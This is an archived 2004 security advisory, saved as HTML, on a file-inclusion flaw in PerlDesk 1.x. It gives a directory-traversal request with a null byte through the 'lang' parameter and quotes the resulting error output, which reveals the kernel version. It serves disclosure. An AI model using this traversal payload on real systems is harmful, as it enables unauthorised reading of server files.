A file inclusion vulnerability exists in PerlDesk 1.x due to insufficient input validation.
fccfe2c244da7f27d78bf36a7fbd20b1efa2f98e85943f0f5988d3d6b984d995
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0031)http://nikyt0x.webcindario.com/ -->
<HTML><HEAD><TITLE>I love this game</TITLE>
<BODY text=#ffffff bgColor=#000000>
<P align=left><B><FONT face=Courier size=2><FONT color=#00ffff>Nikyt0x Site -
Made in Argentina !</FONT></FONT></B></P>
<P align=left><B><FONT face=Courier color=#ff0000 size=2>News </FONT></B></P>
<P align=left><B><FONT face=Courier color=#c0c0c0 size=2>12/09/04</FONT></B></P>
<P align=left><B><FONT face=Courier color=#00ff00 size=2>Posible Inclusion File
in </FONT><FONT face=Courier color=#ff0000 size=2>Perl Desk</FONT></B></P>
<P align=left><B><FONT face=Courier color=#ff0000 size=2>0000-0002
Adv-Nkxtox</FONT></B></P>
<P align=left><B><FONT face=Courier color=#ff0000 size=2>[Date] </FONT><FONT
face=Courier size=2>12/09/04</FONT></B></P>
<P align=left><B><FONT face=Courier color=#ff0000 size=2>[Author] </FONT><FONT
face=Courier size=2>Nikyt0x nikyt0x[at]hotmail[dot]com</FONT></B></P>
<P align=left><B><FONT face=Courier size=2><FONT color=#ff0000>[Site]</FONT>
Http://nikyt0x.webcindario.com</FONT></B></P>
<P align=left><B><FONT color=#ff0000 size=2><FONT
face=Courier>[Information]</FONT></FONT></B></P>
<P align=left><B><FONT face=Courier size=2>PerlDesk is a feature packed web
based help desk and email management application designed to streamline the
operation of managing emails or support requests, with built in tracking and
response logging it is an ideal help desk solution for companies with one or
more members of staff or for those who want to organise client
support.</FONT></B></P>
<P align=left><B><FONT face=Courier color=#ff0000 size=2>[Bug]</FONT></B></P>
<P align=left><B><FONT face=Courier size=2>Bug is in Inclusion in lang.
</FONT></B></P>
<P align=left><B><FONT face=Courier size=2><A
href="http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z">Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z</A></FONT></B></P>
<P align=left><FONT face="Courier New, Courier, mono" size=2>Can't locate
include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods /etc/perl
/usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0
/usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux
/usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl
/usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .)
at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56. </FONT></P>
<P align=left><FONT face="Courier New, Courier, mono" size=2>But if you use:
<FONT color=#c0c0c0>pdesk.cgi?lang=[file]%00</FONT> :</FONT></P>
<P align=left><FONT face="Courier New, Courier, mono" size=2><A
href="http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00">Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00</A></FONT></P>
<P align=left><FONT face="Courier New, Courier, mono" size=2>syntax error at
include/lang/../../../../../../../proc/version line 1, near "2.4.21 ("
Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi
line 56. <BR><BR>If you read error, you can see Version of Kernel
"2.4.21".</FONT></P>
<P align=left><FONT face="Courier New, Courier, mono" size=2>...I love this
game...</FONT></P>
<P align=left> </P>
<P align=left> </P>
<P align=left> </P>
<P align=left> </P>
<P align=left><FONT class=txt style="LINE-HEIGHT: 1" face=Verdana
size=2><BR> </FONT></P>
<P align=left> </P>
<P align=left> </P>
<P align=left> </P>
<P align=left> </P>
<P align=center> </P>
<P align=left> </P></BODY></HTML>